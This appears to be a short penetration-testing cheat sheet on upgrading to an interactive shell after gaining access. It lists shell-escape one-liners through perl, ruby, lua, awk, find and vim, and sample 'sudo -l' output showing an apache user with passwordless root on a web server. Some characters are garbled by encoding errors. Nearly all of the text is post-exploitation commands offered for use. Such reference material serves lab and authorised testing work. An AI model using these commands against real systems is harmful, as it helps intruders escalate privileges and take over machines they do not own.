/bin/sh -i sh: no job control in this shell sh-4.2$
perl 鈥攅 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
awk 'BEGIN {system("/bin/sh")}'
find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
find . -exec /bin/sh \; -quit
vim -c ':!/bin/sh'
vim :set shell=/bin/sh :shell
ls -la <path/to/fileorbinary>
sudo -l Matching Defaults entries for apache on ILF-WebSrv: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User apache may run the following commands on ILF-WebSrv: (ALL : ALL) NOPASSWD: ALL
脷ltima actualizaci贸n hace 7 meses